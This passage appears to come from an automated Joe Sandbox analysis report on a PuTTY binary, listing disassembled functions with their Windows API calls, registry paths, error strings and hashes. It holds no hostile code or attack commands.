                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Menu$AppendDelete
                                                          • String ID: (No sessions)
                                                          • API String ID: 4109642853-1102551510
                                                          • Opcode ID: 35f80733ee2a4ee07da47ec0c04de53f3e6765da5e59e5b27d3bdaea61ebfb4f
                                                          • Instruction ID: 1e4061f9bda17457302c16937d0bcd90184f0ec490aed1e1c92b25e948a62c7f
                                                          • Opcode Fuzzy Hash: 35f80733ee2a4ee07da47ec0c04de53f3e6765da5e59e5b27d3bdaea61ebfb4f
                                                          • Instruction Fuzzy Hash: 3A1102A3B0954291F714AB12E850BE9D311FB8A7D5F810131CF0D87390CE7FE8869324
                                                          Function 00007FF738A58D60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ButtonChecked
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
                                                          • API String ID: 1719414920-1969232164
                                                          • Opcode ID: 966464a0b58c783dee34b93c5abc8ce7e1a7c55995a3109bf2a6e04f4b8752f9
                                                          • Instruction ID: 8c510cafa9ac70343a97182724b1fc60d1ad5c87400d2319475688c2a4ac41d9
                                                          • Opcode Fuzzy Hash: 966464a0b58c783dee34b93c5abc8ce7e1a7c55995a3109bf2a6e04f4b8752f9
                                                          • Instruction Fuzzy Hash: 28018467B06506A1FB51AB56D841575E3A0BB54BD0FC48131CE4C47755EE3EE881E314
                                                          Function 00007FF738A37460 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageShow
                                                          • String ID: %s Error
                                                          • API String ID: 2689832819-1420171443
                                                          • Opcode ID: 529acfc0401a416d9ad773d000b4bc5090383dafba42528ccb05917a9b71ed95
                                                          • Instruction ID: b499014110443ce46f5f250cb4a3bf4ba5c68ac03355d6c630c9b9ebeda97db5
                                                          • Opcode Fuzzy Hash: 529acfc0401a416d9ad773d000b4bc5090383dafba42528ccb05917a9b71ed95
                                                          • Instruction Fuzzy Hash: 4E11BF62A0DA47A0FA40BB11F46067AE762AF847D4FC40131D88E07BA5DF7EE445E729
                                                          Function 00007FF738A375E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageShow
                                                          • String ID: %s Fatal Error
                                                          • API String ID: 2689832819-656502033
                                                          • Opcode ID: d11445575b0614bf457e0b984e93601a16af451a85d6af8722bc36ad077a3d43
                                                          • Instruction ID: f3966094ef2c8c3a929f6e2c8bc4e77756cbd3b418d9bb75cb9a6460d4c0de25
                                                          • Opcode Fuzzy Hash: d11445575b0614bf457e0b984e93601a16af451a85d6af8722bc36ad077a3d43
                                                          • Instruction Fuzzy Hash: 4611C2A3E0954361F7517B22E8107B5D211AB587F5F840230CD5E073D5DE7EE885A329
                                                          Function 00007FF738A691D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A730C0: RegSetValueExA.ADVAPI32 ref: 00007FF738A730F3
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A6924D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$CreateValue
                                                          • String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys
                                                          • API String ID: 1009429713-1135138915
                                                          • Opcode ID: 707bf62c00dda24b4c5b91d2722f252b90ec5e7e0c3ff9450992b339dfa031b0
                                                          • Instruction ID: b88f59f6bc9c20e670e208890b288659b74df19c768b3d32826ca4b4bd44dee9
                                                          • Opcode Fuzzy Hash: 707bf62c00dda24b4c5b91d2722f252b90ec5e7e0c3ff9450992b339dfa031b0
                                                          • Instruction Fuzzy Hash: 9E01A753B0A54661F911B6529801BF5D6006F55BD4F845130EE5D0B7D6ED3ED006A398
                                                          Function 00007FF738A373D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowCursor.USER32(?,?,00000000,00000000,00007FF738A36323,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570,?,?,?,?,00007FF738A6F6B8), ref: 00007FF738A37448
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorShow
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$show
                                                          • API String ID: 3591285015-749648563
                                                          • Opcode ID: ef99cec585a03e5cf51621f00db0197eef3b6756505efe3f39d47df276865edc
                                                          • Instruction ID: fe0ec244000c149f24b06b5b8d90300137f39604a4f0e16a00fdca7128412097
                                                          • Opcode Fuzzy Hash: ef99cec585a03e5cf51621f00db0197eef3b6756505efe3f39d47df276865edc
                                                          • Instruction Fuzzy Hash: 9F018C27E0E29365FA51A7A4E4517B5CA851F05349FC80135C84E072D1CEAF684AB739
                                                          Function 00007FF738A3D3F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MessageBoxA.USER32 ref: 00007FF738A3D44C
                                                            • Part of subcall function 00007FF738A36EF0: CoUninitialize.OLE32(00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570,?,?,?,?,00007FF738A6F6B8), ref: 00007FF738A36F21
                                                            • Part of subcall function 00007FF738A36EF0: DeleteObject.GDI32 ref: 00007FF738A36F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DeleteMessageObjectUninitialize
                                                          • String ID: %s Internal Error$Unsupported protocol number found
                                                          • API String ID: 3083495962-184558026
                                                          • Opcode ID: 24a2c36de2cff0521ef03b6b679d54bb233ba35c2d43b8ca7c46796026308231
                                                          • Instruction ID: a4b57df89ad24b3c4e069b95c81d5e924c76ed90eae01fb89914f973fa1c5fba
                                                          • Opcode Fuzzy Hash: 24a2c36de2cff0521ef03b6b679d54bb233ba35c2d43b8ca7c46796026308231
                                                          • Instruction Fuzzy Hash: 14F06D62E0E603B1FE547761E461BB9D292AF04380FD40035C50D46BD6EE7FB946A27A
                                                          Function 00007FF738A68D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          • RegDeleteKeyA.ADVAPI32 ref: 00007FF738A68DCB
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A68DDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$CreateDelete
                                                          • String ID: Software\SimonTatham\PuTTY\Sessions
                                                          • API String ID: 3931322244-490553574
                                                          • Opcode ID: a4e5ef0fc4aef1ab74433ca8d47f6659cea662aab7a2e3982170b43526d1dfed
                                                          • Instruction ID: 8948445711dae5342b7847e196b65b7fa90c250509ca7cd4c116adbfc97c6722
                                                          • Opcode Fuzzy Hash: a4e5ef0fc4aef1ab74433ca8d47f6659cea662aab7a2e3982170b43526d1dfed
                                                          • Instruction Fuzzy Hash: ECF0F613F1F01250FD01B662B905BF9C2410F44BE4E840130ED1E0B7D6ED3EA046B268
                                                          Function 00007FF738AA8CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DirectorySystem
                                                          • String ID: shell32.dll
                                                          • API String ID: 2188284642-3366042328
                                                          • Opcode ID: 4064919ca29c4320f69ecb9606d7b481c7873b1c8db2f445406ed758b7906284
                                                          • Instruction ID: 2bab603a8ae3c4467e35ca168ad161edf951aa3fb612d03f25f6aeffe592678f
                                                          • Opcode Fuzzy Hash: 4064919ca29c4320f69ecb9606d7b481c7873b1c8db2f445406ed758b7906284
                                                          • Instruction Fuzzy Hash: 63014C63E0D607A5FA10BB14B824765E790AB59784F804635C84D07764CF3EF889A76D
                                                          Function 00007FF738A6460B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control
                                                          • API String ID: 274883806-3277764455
                                                          • Opcode ID: 3954c5f7d90f20679d8ed5bd0e48ac8b10462a58bff91b7b9b9d0e93ef08864b
                                                          • Instruction ID: 642a0c596a807be4089f3d7a61cd9607f595ca71bccb8c3c270893c7e7db6663
                                                          • Opcode Fuzzy Hash: 3954c5f7d90f20679d8ed5bd0e48ac8b10462a58bff91b7b9b9d0e93ef08864b
                                                          • Instruction Fuzzy Hash: 96F0F427E0D603A1FA21EB11D440579E310EF89B80FC08231DA4D06A88DE7EE681E724
                                                          Function 00007FF738A644D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Event_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/handle-io.c$h->type == HT_INPUT
                                                          • API String ID: 1844187620-2652805585
                                                          • Opcode ID: 5744f6e360a9956b53c12a30498589dfb877221bb7f80da0d79338a7506ed750
                                                          • Instruction ID: 09d2f116d5852eefb5183ee45c00cce0d1c2750553db7c802fe7252a4444f112
                                                          • Opcode Fuzzy Hash: 5744f6e360a9956b53c12a30498589dfb877221bb7f80da0d79338a7506ed750
                                                          • Instruction Fuzzy Hash: D5F0C253F0E443A2FB32A714E8447BAE7909F45795FC85031CA8D069C09E7FE480A329
                                                          Function 00007FF738A37690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageShow
                                                          • String ID: %s Error
                                                          • API String ID: 2689832819-1420171443
                                                          • Opcode ID: a704828ae85002741c63dab488402cd9ba812a79143d62327dbbdfde6245da39
                                                          • Instruction ID: c304599d092ac33ca5973aa4fe58429a3e1f8fb98e18d668672953cab0b73390
                                                          • Opcode Fuzzy Hash: a704828ae85002741c63dab488402cd9ba812a79143d62327dbbdfde6245da39
                                                          • Instruction Fuzzy Hash: 76F0F662F0954365FB117B12E810775D612AF58BD8F840131CC0D07795CE7EA885E33A
                                                          Function 00007FF738A51D40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: PlacementWindow
                                                          • String ID: ,
                                                          • API String ID: 2154376794-3772416878
                                                          • Opcode ID: 1599f23c370a092ffdf6d629b96b88d901f2dd33717e64197277e8eac1224313
                                                          • Instruction ID: 54c18e18516b38cddd44463dff2e1cbae2f21be6ed2ea45edf95fdab0c397705
                                                          • Opcode Fuzzy Hash: 1599f23c370a092ffdf6d629b96b88d901f2dd33717e64197277e8eac1224313
                                                          • Instruction Fuzzy Hash: 29F0D6A390C283A5F750E720F454739F790EB44794F840230D48C06658DF7DD489DB15
                                                          Function 00007FF738A53BA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 00007FF738A53BAD
                                                          • %s Key File Warning, xrefs: 00007FF738A53BBF
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: %s Key File Warning$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
                                                          • API String ID: 2030045667-89788609
                                                          • Opcode ID: 77b961b021a589ef590278e8392d42d676c1bfc2c9bd2e428c83d01960df96f3
                                                          • Instruction ID: 544cdea95d728adca697d1626915665995cf41dfd32b26b360b55a98a6354c2a
                                                          • Opcode Fuzzy Hash: 77b961b021a589ef590278e8392d42d676c1bfc2c9bd2e428c83d01960df96f3
                                                          • Instruction Fuzzy Hash: 7BE0A012F0A45362FC00772269658BAD2026F55BE0BC05431DC0E1BB8AED3DA102A369
                                                          Function 00007FF738A72840 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: SetDefaultDllDirectories$kernel32.dll
                                                          • API String ID: 190572456-2102062458
                                                          • Opcode ID: 9830d294756c0564b70129235caa052b3906503412b90637ab17cb9ff3af1617
                                                          • Instruction ID: d970d47416d13d8ac71d414954e13c3d118edf028efb8ea30115061080eacce8
                                                          • Opcode Fuzzy Hash: 9830d294756c0564b70129235caa052b3906503412b90637ab17cb9ff3af1617
                                                          • Instruction Fuzzy Hash: 9EF0D052E0BB03A1FE95BB55D851770E290AF54300FD50539D50E02391EE3FA945B22D